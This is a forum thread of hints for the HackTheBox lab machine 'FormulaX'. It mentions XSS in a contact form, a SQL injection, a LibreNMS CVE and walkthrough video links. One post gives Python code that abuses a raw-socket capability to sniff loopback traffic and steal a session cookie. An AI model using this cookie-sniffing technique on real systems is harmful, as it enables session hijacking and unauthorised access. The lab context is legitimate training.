HTB - FormulaX
by paven - Saturday March 9, 2024 at 12:54 PM
#31
(Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?
[/quote]

Here is the walkthrough video : https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin

found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
Reply
#32
(Mar 11, 2024, 06:16 AM)dolare141 Wrote:
(Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?

Here is the walkthrough video : https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin

found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
[/quote]

ty for the help
Reply
#33
Here is my method to get librenms from www-data.

/usr/bin/python3.10 has the cap_net_raw capabilities so you can sniff raw socket.

Just download on your local box the pcap and dpkt pip package, make an archive and upload it to the box next in the same directory of the followging code.

It will dump the tcp 3000 port traffic and You can get the cookie to login to the librenms web interface

import pcap
import dpkt

def decode_udp(packet):
    eth = dpkt.ethernet.Ethernet(packet)

    if not isinstance(eth.data, dpkt.ip.IP):
        return None

    ip = eth.data

    if not isinstance(ip.data, dpkt.tcp.TCP):
        return None

    tcp = ip.data

    if tcp.dport == 3000:
        return tcp.data

def main():
    interface = 'lo'  # Change to your interface
    pc = pcap.pcap(name=interface,  promisc=True,  immediate=True)

    for timestamp, packet in pc:
        data = decode_udp(packet)
        if data:
            print("Received TCP packet on port 80:")
            print(data.decode('utf-8', 'ignore'))

if __name__ == "__main__":
    main()
Reply
#34
thanks for sharing the tips :-)
Reply
#35
(Mar 11, 2024, 06:16 AM)dolare141 Wrote:
(Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?

Here is the walkthrough video : https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here , any hint for becoming admin

found a sqli but cant dump the db , only current_user , hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
[/quote]

after got message connected but does need setting the netcat to listen or something to move to root
Reply
#36
how can i become admin on librenms? I tried CVE-2023-5591 but i can't make it work...
Reply
#37
rooted.
Insane for me but rooted at all.
PM for hints
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 66 1,774 2 hours ago
Last Post: vlka
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 370 92,500 8 hours ago
Last Post: lifolifo007
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,209 10 hours ago
Last Post: kkkato
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,521 Apr 29, 2026, 11:06 PM
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 414 Apr 29, 2026, 10:36 PM
Last Post: op334

Forum Jump:


 Users browsing this forum: 1 Guest(s)